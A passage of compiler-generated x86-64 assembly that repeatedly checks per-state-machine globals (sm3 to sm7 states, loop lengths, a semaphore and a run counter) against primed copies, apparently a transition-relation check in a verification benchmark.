jne LBB1_169
## %bb.167: ## in Loop: Header=BB1_70 Depth=1
movq _sm3_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_169
## %bb.168: ## in Loop: Header=BB1_70 Depth=1
movq _sm3_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm3_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_169: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm3_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_173
## %bb.170: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_173
## %bb.171: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_173
## %bb.172: ## in Loop: Header=BB1_70 Depth=1
movq _sm3_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_173: ## in Loop: Header=BB1_70 Depth=1
movq _sm3_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm3_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_178
## %bb.174: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_177
## %bb.175: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_177
## %bb.176: ## in Loop: Header=BB1_70 Depth=1
movq _sm3_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_178
LBB1_177: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $3, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_178: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_181
## %bb.179: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $3, (%rax)
jne LBB1_181
## %bb.180: ## in Loop: Header=BB1_70 Depth=1
movq _sm3_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm3_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_181: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_185
## %bb.182: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm3_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_185
## %bb.183: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $3, (%rax)
jne LBB1_185
## %bb.184: ## in Loop: Header=BB1_70 Depth=1
movq _sm3_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_185: ## in Loop: Header=BB1_70 Depth=1
movq _sm4_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_187
## %bb.186: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm4_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm4_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_189
LBB1_187: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm4_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_189
## %bb.188: ## in Loop: Header=BB1_70 Depth=1
movq _sm4_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_189: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm4_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_191
## %bb.190: ## in Loop: Header=BB1_70 Depth=1
movq _sm4_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_192
LBB1_191: ## in Loop: Header=BB1_70 Depth=1
movq _sm4_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm4_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_192: ## in Loop: Header=BB1_70 Depth=1
movq _sm4_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_194
## %bb.193: ## in Loop: Header=BB1_70 Depth=1
movq _sm4_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm4_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_194: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm4_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_197
## %bb.195: ## in Loop: Header=BB1_70 Depth=1
movq _sm4_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_197
## %bb.196: ## in Loop: Header=BB1_70 Depth=1
movq _sm4_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm4_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_197: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm4_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_201
## %bb.198: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_201
## %bb.199: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_201
## %bb.200: ## in Loop: Header=BB1_70 Depth=1
movq _sm4_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_201: ## in Loop: Header=BB1_70 Depth=1
movq _sm4_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm4_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_206
## %bb.202: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_205
## %bb.203: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_205
## %bb.204: ## in Loop: Header=BB1_70 Depth=1
movq _sm4_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_206
LBB1_205: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $4, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_206: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_209
## %bb.207: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $4, (%rax)
jne LBB1_209
## %bb.208: ## in Loop: Header=BB1_70 Depth=1
movq _sm4_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm4_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_209: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_213
## %bb.210: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm4_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_213
## %bb.211: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $4, (%rax)
jne LBB1_213
## %bb.212: ## in Loop: Header=BB1_70 Depth=1
movq _sm4_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_213: ## in Loop: Header=BB1_70 Depth=1
movq _sm5_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_215
## %bb.214: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm5_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm5_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_217
LBB1_215: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm5_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_217
## %bb.216: ## in Loop: Header=BB1_70 Depth=1
movq _sm5_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_217: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm5_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_219
## %bb.218: ## in Loop: Header=BB1_70 Depth=1
movq _sm5_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_220
LBB1_219: ## in Loop: Header=BB1_70 Depth=1
movq _sm5_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm5_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_220: ## in Loop: Header=BB1_70 Depth=1
movq _sm5_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_222
## %bb.221: ## in Loop: Header=BB1_70 Depth=1
movq _sm5_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm5_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_222: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm5_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_225
## %bb.223: ## in Loop: Header=BB1_70 Depth=1
movq _sm5_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_225
## %bb.224: ## in Loop: Header=BB1_70 Depth=1
movq _sm5_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm5_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_225: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm5_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_229
## %bb.226: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_229
## %bb.227: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_229
## %bb.228: ## in Loop: Header=BB1_70 Depth=1
movq _sm5_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_229: ## in Loop: Header=BB1_70 Depth=1
movq _sm5_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm5_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_234
## %bb.230: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_233
## %bb.231: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_233
## %bb.232: ## in Loop: Header=BB1_70 Depth=1
movq _sm5_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_234
LBB1_233: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $5, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_234: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_237
## %bb.235: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $5, (%rax)
jne LBB1_237
## %bb.236: ## in Loop: Header=BB1_70 Depth=1
movq _sm5_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm5_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_237: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_241
## %bb.238: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm5_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_241
## %bb.239: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $5, (%rax)
jne LBB1_241
## %bb.240: ## in Loop: Header=BB1_70 Depth=1
movq _sm5_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_241: ## in Loop: Header=BB1_70 Depth=1
movq _sm6_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_243
## %bb.242: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm6_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm6_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_245
LBB1_243: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm6_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_245
## %bb.244: ## in Loop: Header=BB1_70 Depth=1
movq _sm6_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_245: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm6_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_247
## %bb.246: ## in Loop: Header=BB1_70 Depth=1
movq _sm6_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_248
LBB1_247: ## in Loop: Header=BB1_70 Depth=1
movq _sm6_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm6_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_248: ## in Loop: Header=BB1_70 Depth=1
movq _sm6_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_250
## %bb.249: ## in Loop: Header=BB1_70 Depth=1
movq _sm6_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm6_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_250: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm6_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_253
## %bb.251: ## in Loop: Header=BB1_70 Depth=1
movq _sm6_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_253
## %bb.252: ## in Loop: Header=BB1_70 Depth=1
movq _sm6_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm6_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_253: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm6_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_257
## %bb.254: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_257
## %bb.255: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_257
## %bb.256: ## in Loop: Header=BB1_70 Depth=1
movq _sm6_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_257: ## in Loop: Header=BB1_70 Depth=1
movq _sm6_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm6_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_262
## %bb.258: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_261
## %bb.259: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_261
## %bb.260: ## in Loop: Header=BB1_70 Depth=1
movq _sm6_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_262
LBB1_261: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $6, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_262: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_265
## %bb.263: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $6, (%rax)
jne LBB1_265
## %bb.264: ## in Loop: Header=BB1_70 Depth=1
movq _sm6_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm6_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_265: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_269
## %bb.266: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm6_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_269
## %bb.267: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $6, (%rax)
jne LBB1_269
## %bb.268: ## in Loop: Header=BB1_70 Depth=1
movq _sm6_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_269: ## in Loop: Header=BB1_70 Depth=1
movq _sm7_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_271
## %bb.270: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm7_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm7_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_273
LBB1_271: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm7_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_273
## %bb.272: ## in Loop: Header=BB1_70 Depth=1
movq _sm7_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_273: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm7_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_275
## %bb.274: ## in Loop: Header=BB1_70 Depth=1
movq _sm7_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_276
LBB1_275: ## in Loop: Header=BB1_70 Depth=1
movq _sm7_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm7_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_276: ## in Loop: Header=BB1_70 Depth=1
movq _sm7_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_278
## %bb.277: ## in Loop: Header=BB1_70 Depth=1
movq _sm7_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm7_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_278: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm7_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_281
## %bb.279: ## in Loop: Header=BB1_70 Depth=1
movq _sm7_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_281
## %bb.280: ## in Loop: Header=BB1_70 Depth=1
movq _sm7_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm7_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_281: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm7_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_285
## %bb.282: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_285
## %bb.283: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_285
## %bb.284: ## in Loop: Header=BB1_70 Depth=1
movq _sm7_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_285: ## in Loop: Header=BB1_70 Depth=1
movq _sm7_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm7_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_290
## %bb.286: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_289
## %bb.287: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_289
## %bb.288: ## in Loop: Header=BB1_70 Depth=1
movq _sm7_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_290
LBB1_289: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $7, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_290: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_293
## %bb.291: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $7, (%rax)
jne LBB1_293
## %bb.292: ## in Loop: Header=BB1_70 Depth=1
movq _sm7_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm7_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_293: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_297
## %bb.294: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm7_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_297
## %bb.295: ## in Loop: Header=BB1_70 Depth=1
